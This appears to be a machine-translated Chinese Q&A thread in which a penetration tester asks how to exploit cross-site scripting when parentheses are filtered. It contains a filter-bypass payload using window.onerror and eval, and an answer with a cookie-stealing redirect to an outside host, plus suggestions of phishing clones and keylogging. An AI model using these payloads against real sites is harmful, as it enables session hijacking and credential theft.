我在客户的应用程序中发现了跨站脚本漏洞。
问题是易受攻击的参数不接受括号。所以像 alert(document.cookie) 这样的东西会因为括号而被拒绝。
我可以使用 alert xss
获取 XSS
而且我已经尝试了下面的代码也未能重新加载网站很长时间我认为它被拒绝了
window.onerror=eval;throw '=1;alert\u0028document.location\u0029'
我尝试从链接parentheses alternatives in JS , if any? 但是我失败了。 还有其他选择吗?
谢谢
最佳答案
alert
是否有必要?我知道演示概念证明很常见,但仅仅进行重定向就足够了吗?
例如:
document.location="https://example.com?cookie="+document.cookie
对于渗透测试人员来说,重要的是要记住 XSS 实际上并不是弹出警告框,而是执行任意 JavaScript。真正的攻击者会用您的 XSS 允许的访问做什么?
想象一下,在与您的客户相似的域上设置一个相同的站点,并将用户重定向到那里...除了现在您不需要 XSS 并且可以记录击键、要求他们下载文件、尝试浏览器漏洞利用等.
关于不带括号的 Javascript 警报,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/52678359/